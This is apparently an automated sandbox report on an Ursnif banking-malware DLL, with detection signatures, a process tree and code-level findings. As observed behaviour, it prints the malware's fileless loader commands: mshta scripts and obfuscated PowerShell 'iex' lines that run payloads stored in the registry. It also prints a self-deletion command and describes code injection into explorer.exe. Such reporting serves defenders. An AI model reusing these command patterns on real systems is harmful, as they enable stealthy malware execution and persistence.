
Windows Analysis Report
61f113091fd0c.dll

Overview

General Information

Sample Name: 61f113091fd0c.dll
Analysis ID: 560270
MD5: 687f33ac9cb2e8b3c1e7659422caf253
SHA1: 472513fe01ecbc2f51d70d762c1992a4a24c6c15
SHA256: d1ca0d9f10382d484d02e90d4d5d987653de42a8c4eb5544e4368e4f1965803c
Tags: dll exe TNT

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Sigma detected: Windows Shell File Write to Suspicious Folder
Maps a DLL or memory area into another process
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Writes or reads registry keys via WMI
Sigma detected: Suspicious Remote Thread Created
Machine Learning detection for sample
Allocates memory in foreign processes
Self deletion via cmd delete
Sigma detected: MSHTA Spawning Windows Shell
Injects code into the Windows Explorer (explorer.exe)
Sigma detected: Suspicious Call by Ordinal
Sigma detected: Accessing WinAPI in PowerShell. Code Injection.
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Writes registry values via WMI
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Sigma detected: Suspicious Rundll32 Activity
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Registers a DLL
Sigma detected: Suspicious Csc.exe Source File Folder
PE / OLE file has an invalid certificate
Compiles C# or VB.Net code
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll32.exe (PID: 6248 cmdline: loaddll32.exe "C:\Users\user\Desktop\61f113091fd0c.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 60 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\61f113091fd0c.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 4768 cmdline: rundll32.exe "C:\Users\user\Desktop\61f113091fd0c.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 5064 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
          • rundll32.exe (PID: 5756 cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
    • regsvr32.exe (PID: 6100 cmdline: regsvr32.exe /s C:\Users\user\Desktop\61f113091fd0c.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
      • control.exe (PID: 3088 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
        • explorer.exe (PID: 3352 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • cmd.exe (PID: 5944 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\61f113091fd0c.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
            • conhost.exe (PID: 5536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • rundll32.exe (PID: 5376 cmdline: rundll32.exe C:\Users\user\Desktop\61f113091fd0c.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • control.exe (PID: 4884 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
        • rundll32.exe (PID: 6292 cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
    • control.exe (PID: 3360 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
  • mshta.exe (PID: 7156 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Tm45='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Tm45).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 2924 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 4556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 5520 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ugg3o5nf.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5692 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEA8.tmp" "c:\Users\user\AppData\Local\Temp\CSC38F7C9333840429F8E926B6BB254946E.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 7084 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pqvogmwc.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6012 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4A3A.tmp" "c:\Users\user\AppData\Local\Temp\CSC176C1CB9788E4426ACAF7B271AB13B4.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • mshta.exe (PID: 1956 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Sr9b='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Sr9b).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 1664 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 1284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6068 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sjfy431f.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 7072 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEEEB.tmp" "c:\Users\user\AppData\Local\Temp\CSCA98C8C663682422BB3F042EAAC3AA5FC.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 5364 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0hsihch1.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6976 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2E65.tmp" "c:\Users\user\AppData\Local\Temp\CSC7E62D986CCD14293A1B1D71B70775B41.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • mshta.exe (PID: 6092 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Agjk='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Agjk).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 5940 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6924 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tpt0a0ul.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 240 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES105D.tmp" "c:\Users\user\AppData\Local\Temp\CSC2A73DB97C702412EB695E62356797BBE.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 2060 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pwlcj2cu.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 2328 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4C6C.tmp" "c:\Users\user\AppData\Local\Temp\CSC1CA052A85412AB8DCD9B872B5234E.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • mshta.exe (PID: 5280 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Eote='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Eote).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 1764 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name gpcceqbj -value gp; new-alias -name qlrwbeixf -value iex; qlrwbeixf ([System.Text.Encoding]::ASCII.GetString((gpcceqbj "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 5912 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oyq1c2cj.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5276 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF563.tmp" "c:\Users\user\AppData\Local\Temp\CSC8BAF1FC523B466D86EA8211DF896A.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 6864 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\oeprcmty.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 3996 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3848.tmp" "c:\Users\user\AppData\Local\Temp\CSCCBF2AAC487274BF4B5441EA2B445AE92.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup
No configs have been found
Source | Rule | Description | Author
00000005.00000003.311254885.0000000005568000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000003.00000003.365747529.0000000005608000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000003.00000003.318724371.0000000005608000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000020.00000003.461557697.000002094CD9C000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000003.00000003.319004486.0000000005608000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security

System Summary

Source: File created | Author: Florian Roth | Data: EventID: 11, Image: C:\Windows\System32\mshta.exe, ProcessId: 7156, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Caches
Source: Threat created | Author: Perez Diego (@darkquassar), oscd.community | Data: EventID: 8, SourceImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, SourceProcessId: 5940, StartAddress: 8DCB1580, TargetImage: C:\Windows\explorer.exe, TargetProcessId: 3352
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Agjk='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Agjk).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6092, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), ProcessId: 5940
Source: Process started | Author: Florian Roth | Data: Command: rundll32.exe "C:\Users\user\Desktop\61f113091fd0c.dll",#1, CommandLine: rundll32.exe "C:\Users\user\Desktop\61f113091fd0c.dll",#1, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\61f113091fd0c.dll",#1, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 60, ProcessCommandLine: rundll32.exe "C:\Users\user\Desktop\61f113091fd0c.dll",#1, ProcessId: 4768
Source: Threat created | Author: Nikita Nazarov, oscd.community | Data: EventID: 8, SourceImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, SourceProcessId: 5940, StartAddress: 8DCB1580, TargetImage: C:\Windows\explorer.exe, TargetProcessId: 3352
Source: Process started | Author: Florian Roth | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Agjk='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Agjk).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6092, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), ProcessId: 5940
Source: Process started | Author: juju4, Jonhnathan Ribeiro, oscd.community | Data: Command: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, CommandLine|base64offset|contains: , Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: C:\Windows\system32\control.exe -h, ParentImage: C:\Windows\System32\control.exe, ParentProcessId: 4884, ProcessCommandLine: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h, ProcessId: 6292
Source: Process started | Author: Florian Roth | Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sjfy431f.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sjfy431f.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 1664, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sjfy431f.cmdline, ProcessId: 6068
Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 5940, TargetFilename: C:\Users\user\AppData\Local\Temp\tpt0a0ul.cmdline
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), CommandLine|base64offset|contains: >jX, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Agjk='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Agjk).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 6092, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name rstcfqup -value gp; new-alias -name xanymucsw -value iex; xanymucsw ([System.Text.Encoding]::ASCII.GetString((rstcfqup "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram)), ProcessId: 5940
Source: Pipe created | Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) | Data: PipeName: \PSHost.132876952995739408.5940.DefaultAppDomain.powershell


AV Detection

Source: 61f113091fd0c.dll | Joe Sandbox ML: detected
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_01C178F2 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,1_2_01C178F2
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_031F78F2 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,3_2_031F78F2
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_010578F2 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,5_2_010578F2
Source: 61f113091fd0c.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: Binary string: ntdll.pdb | source: loaddll32.exe, 00000001.00000003.455695462.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.440284992.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.454013508.0000000006360000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.435436816.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.429285803.00000000064C0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.439095932.0000000006110000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ntdll.pdbUGP | source: loaddll32.exe, 00000001.00000003.455695462.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.440284992.0000000004CB0000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.454013508.0000000006360000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.435436816.00000000062A0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.429285803.00000000064C0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.439095932.0000000006110000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_046CB190 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,1_2_046CB190
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_046CB2F7 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,1_2_046CB2F7
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_046DD39D lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,1_2_046DD39D
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_04BCB190 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,3_2_04BCB190
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_04BCB2F7 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,3_2_04BCB2F7
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_04BDD39D lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,3_2_04BDD39D
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_05EAB190 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,4_2_05EAB190
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_05EBD39D lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,4_2_05EBD39D
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_05EAB2F7 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,4_2_05EAB2F7
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0511B190 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,5_2_0511B190
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0512D39D lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,5_2_0512D39D
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_0511B2F7 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,5_2_0511B2F7
Source: C:\Windows\System32\loaddll32.exe | Code function: 1_2_046DFD82 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,1_2_046DFD82

Networking

